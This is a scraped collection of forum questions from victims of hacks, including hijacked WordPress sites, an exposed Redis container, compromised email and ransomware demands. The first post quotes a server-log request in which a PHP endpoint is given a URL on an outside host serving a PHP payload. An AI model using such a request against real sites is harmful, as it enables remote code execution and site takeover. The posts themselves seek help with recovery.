security – My site appears to be hacked?

I recently found that some random posts have been made from one of our users’ accounts without the user’s consent. We checked vividly with the security plugins but didn’t find anything. While we checked our server logs we found something like /ajax-index.php?url=http://majoydiego.com/wp-includes/css/dist/components/style.css

This URL contains a PHP payload.

Can anyone help me understand what this code is exactly and how the hacker gets access to my user and is able to post? I uninstalled all those plugins and tried to secure as much as possible, but I am still worried!!!

network – Have I been hacked (netstat output too many dgrams and stream connections)

netstat output

These are the output images of the netstat command I ran. It shows that there are too many outbound connections and many dgrams and streams. I also tried to capture the output using Wireshark and then reverse-checked whom the IP addresses belong to (using www.arin.net); it showed various organisations (Google, Astricia).

I also tried to turn off the wifi and then ran netstat, but there was no change in the dgram and stream connections.

Please help, any input will be appreciated.

Redis docker container has been hacked, next steps?

I accidentally left the port of my Redis container open and noticed that it crashed all the time today.

Now the mounted volume is full of files like red2.so, admin, root, www, apache, backup.db.

I closed the port, deleted the files and rebuilt the Docker container. Is there a risk of my server outside of the container being infected?

There are no new or altered entries in crontab or the .ssh/authorized_keys file, but I’m not sure what I should check additionally.

[my] Inmotionhosting Email Hacked

I had multiple email accounts hacked across multiple hosting accounts. The hacker got into my email account and replied to all my emails wit… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1816612&goto=newpost

mysql – Three of my WordPress sites got hacked, trying to understand how and how to prevent it

Today I noticed three of my WordPress sites were hacked and were redirecting visitors to other sites. It took me a while to figure out what exactly was changed. Apparently, “siteurl” and “home” were changed in the wp_options table.

I’m not entirely sure which version of WordPress these specific sites used, but since I check for a new WordPress version at least once a month, it must have been 5.4.x. Oddly enough, one of the hacked sites says it’s using v4.9.8. I can’t (easily) check the others since I have not yet gained control of the Dashboard.

So how did this happen? Was this a known vulnerability in WordPress or perhaps one of its plugins? How can I investigate this further?

Edit:
I also just noticed most (if not all) posts have been changed and also redirect to other sites.

Edit 2:
I checked all WordPress files and none were world-writable, but I did see one glaring mistake I made, which all hacked sites had in common. On all three of those sites I edited wp-config.php by hand, leaving a world-readable backup (wp-config.php~) behind. This file contains the WP database’s user and password. But I still don’t understand how they used that to change the database. How did they gain access to MySQL?

WHT Hacked?

Hey Everyone.

While searching a topic, Google presented me with this link (https-www-ukfast-co-uk/hosting-news/webhosting-talk-hacked-htm… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1815114&goto=newpost

email – Hacked E-Mail?? Yahoo

Problem: When someone REPLIES to an e-mail I sent, the name in the TO field is my correct name (this is what that sender sees), but the e-mail address is NOT MINE. Ergo, when someone replies to my e-mail, it goes to another person’s e-mail so I don’t even get it.

EXAMPLE: My name IS JOHN SMITH

My “JOHN SMITH” e-mail address is johnsmith@provider.com, BUT next to my real name, JOHN SMITH, is another’s e-mail address. So, it is:

JOHN SMITH 12345@PROVIDER.COM when it should be JOHN SMITH johnsmith@provider.com

Ransomware demands for site that was NEVER hacked.

I’m just curious how many members and guests here get ransomware demands on websites that were NEVER hacked? Do … | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1814990&goto=newpost